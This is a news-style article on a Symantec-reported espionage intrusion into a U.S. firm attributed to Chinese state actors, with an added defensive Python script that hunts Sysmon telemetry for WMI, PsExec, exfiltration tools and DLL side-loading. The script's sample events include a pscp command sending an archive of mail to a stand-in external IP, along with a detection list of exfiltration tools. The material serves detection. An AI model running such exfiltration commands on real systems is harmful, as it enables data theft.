A recent report has revealed that a major U.S. firm fell victim to a four-month-long cyberattack, suspected to be orchestrated by Chinese state-sponsored hackers. According to cybersecurity experts from Broadcom-owned Symantec, the malicious activity began on April 11, 2024, and persisted until August, though the possibility of an earlier intrusion has not been ruled out.
Attack Methodology: Lateral Movement and Email Harvesting
The threat actors behind this campaign employed a variety of tactics to infiltrate the target organization's network. Symantec's Threat Hunter Team found that the attackers moved laterally across the victim's internal systems, compromising multiple machines. Notably, some of the compromised machines were Microsoft Exchange servers, suggesting that the intruders were after email data.
Additionally, the attackers deployed exfiltration tools, indicating that valuable information was stolen during the operation. While the name of the affected organization remains undisclosed, sources suggest it holds significant business ties to China.
Tactics Linked to Chinese Threat Actors
The techniques and tools used in the attack strongly suggest that China-based threat actors were behind the breach. The investigators observed DLL side-loading, a technique long favored by Chinese espionage groups, and some artifacts recovered during the investigation overlap with those seen in the previously documented Chinese operation known as Crimson Palace. Neither indicator is conclusive on its own, since DLL side-loading is also used by other actors, so the attribution rests on the combination of tooling, tradecraft, and targeting rather than on any single artifact.
This breach isn't the first time the organization has been targeted by Chinese threat actors. In 2023, it was attacked by Daggerfly, a group also tracked as Bronze Highland, Evasive Panda, and StormBamboo. The repeat targeting indicates sustained interest in the organization rather than opportunistic activity, which is characteristic of state-directed collection.
Tools and Techniques Used by the Attackers
Symantec's investigation revealed that the attackers relied on a mix of open-source tools and living-off-the-land (LotL) techniques. These included FileZilla, Impacket, PSCP, and PowerShell, the Sysinternals PsExec utility, and native Windows Management Instrumentation (WMI). Because administrators use the same tools legitimately, this activity blends in with routine operations and is unlikely to trip signature-based defenses, which helped the threat actors move within the network without being noticed.
Interestingly, Symantec's analysis found that the earliest sign of compromise was a command executed via WMI from another system within the organization's network. For that command to be issued, the attackers must already have controlled at least one other machine, so the intrusion likely began before April 11, 2024.
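The tradecraft described in this section and in the attribution section above (remote WMI execution, PsExec, LotL exfiltration tools, and DLL side-loading) leaves recognizable traces in endpoint telemetry. The following hunting script is an added example written for this page; it is not part of Symantec's report, and the Sysmon-style events it searches are constructed for the demonstration. Field names follow Sysmon's ProcessCreate (EventID 1) and ImageLoad (EventID 7) events; the detection thresholds and the list of exfiltration tools are the author's assumptions.

```python
"""Hunt Sysmon-style JSON events for remote WMI execution, PsExec, LotL
exfiltration tools and DLL side-loading (added example, not Symantec's code)."""
import json
import ntpath

# Constructed sample telemetry, not real victim data. One JSON object per line.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Computer": "WS-17", "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "CommandLine": "cmd.exe /c whoami > C:\\Windows\\Temp\\o.txt"}
{"EventID": 1, "Computer": "WS-17", "Image": "C:\\Windows\\PSEXESVC.exe", "ParentImage": "C:\\Windows\\System32\\services.exe", "CommandLine": "C:\\Windows\\PSEXESVC.exe"}
{"EventID": 1, "Computer": "EXCH-01", "Image": "C:\\Users\\Public\\pscp.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "pscp.exe -pw ***** C:\\Users\\Public\\mail.7z user@203.0.113.5:/tmp/"}
{"EventID": 7, "Computer": "WS-17", "Image": "C:\\Users\\Public\\Updater\\legit.exe", "ImageLoaded": "C:\\Users\\Public\\Updater\\version.dll", "Signed": "false"}
{"EventID": 7, "Computer": "WS-17", "Image": "C:\\Program Files\\Vendor\\app.exe", "ImageLoaded": "C:\\Windows\\System32\\version.dll", "Signed": "true"}
{"EventID": 1, "Computer": "WS-02", "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"}
"""

# Directories where unsigned DLLs next to a signed binary are less suspicious
# (assumption: tune to the environment; many vendors install elsewhere).
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Assumed list of LotL file-transfer tools worth flagging on servers.
EXFIL_TOOLS = {"pscp.exe", "filezilla.exe"}


def parse_events(text):
    """Parse JSON-lines telemetry into dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def base(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def directory(path):
    """Lower-cased parent directory of a Windows path."""
    return ntpath.dirname(path).lower()


def in_system_dir(path):
    """True if the path lives under one of SYSTEM_DIRS."""
    return path.lower().startswith(SYSTEM_DIRS)


def hunt(events):
    """Return (rule, host, detail) tuples for every event matching a rule."""
    hits = []
    for ev in events:
        host = ev.get("Computer", "?")
        if ev.get("EventID") == 1:
            image, parent = ev.get("Image", ""), ev.get("ParentImage", "")
            # Remote Win32_Process.Create calls are serviced by the WMI provider
            # host, so the spawned process has WmiPrvSE.exe as its parent.
            if base(parent) == "wmiprvse.exe":
                hits.append(("wmi_remote_exec", host, ev.get("CommandLine", "")))
            # PsExec installs a temporary service whose binary is PSEXESVC.exe.
            if base(image) == "psexesvc.exe":
                hits.append(("psexec_service", host, image))
            if base(image) in EXFIL_TOOLS:
                hits.append(("exfil_tool", host, ev.get("CommandLine", "")))
        elif ev.get("EventID") == 7:
            proc, dll = ev.get("Image", ""), ev.get("ImageLoaded", "")
            # Side-loading heuristic: an unsigned DLL loaded from the process's
            # own directory, outside the system and program trees. In Sysmon
            # EventID 7 the Signed field describes the loaded image.
            if (ev.get("Signed", "").lower() == "false"
                    and directory(dll) == directory(proc)
                    and not in_system_dir(dll)):
                hits.append(("dll_sideload", host, f"{base(proc)} loaded {dll}"))
    return hits


def hosts_by_rule(hits):
    """Group matched hosts per rule, handy for deciding where to pivot next."""
    grouped = {}
    for rule, host, _ in hits:
        grouped.setdefault(rule, set()).add(host)
    return {rule: sorted(hosts) for rule, hosts in grouped.items()}


if __name__ == "__main__":
    for rule, host, detail in hunt(parse_events(SAMPLE_EVENTS)):
        print(f"{rule:16} {host:8} {detail}")
```

Two caveats matter in practice. A WmiPrvSE.exe parent also appears for local WMI use, so a `wmi_remote_exec` hit should be correlated with a network logon (Security event 4624, logon type 3) on the same host around the same time to identify the source machine, which is exactly the pivot Symantec used to push the intrusion's start date earlier. The side-loading rule is a heuristic and will fire on unsigned third-party software installed in user directories; treat it as a lead to enrich with the binary's hash and prevalence, not as a verdict.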
Focus on Microsoft Exchange Servers
One of the key targets in this attack was Microsoft Exchange servers. The attackers’ focus on email infrastructure further supports the theory that the goal was to exfiltrate sensitive communications. As email servers often house a treasure trove of confidential information, this tactic is frequently used by cyber-espionage groups aiming to gather intelligence.
Chinese Cyber Offensive Ecosystem
This breach sheds light on the broader dynamics of Chinese cyber operations. According to a report by Orange Cyberdefense, Chinese cyberattacks often involve complex networks of private and public entities. Universities and hack-for-hire contractors play critical roles, often executing operations under the direction of state-affiliated organizations like the Ministry of State Security or People’s Liberation Army.
To obscure attribution, Chinese operatives often establish fake companies that appear to engage in legitimate business but are, in fact, fronts for cyber-espionage activities. These companies procure digital infrastructure and recruit personnel for hacking operations, further complicating efforts to trace the attacks back to the Chinese government.
Conclusion
The discovery of this four-month cyberattack against a U.S. firm linked to Chinese hackers is a stark reminder of the persistent threat posed by state-sponsored cyber-espionage groups. With well-established tactics such as lateral movement, email harvesting, and DLL side-loading, these threat actors continue to breach organizations through patient, well-resourced campaigns. As defenses evolve, so will the strategies of these determined attackers, which argues for constant vigilance and, in particular, detection focused on the abuse of legitimate administrative tools rather than on malware signatures alone.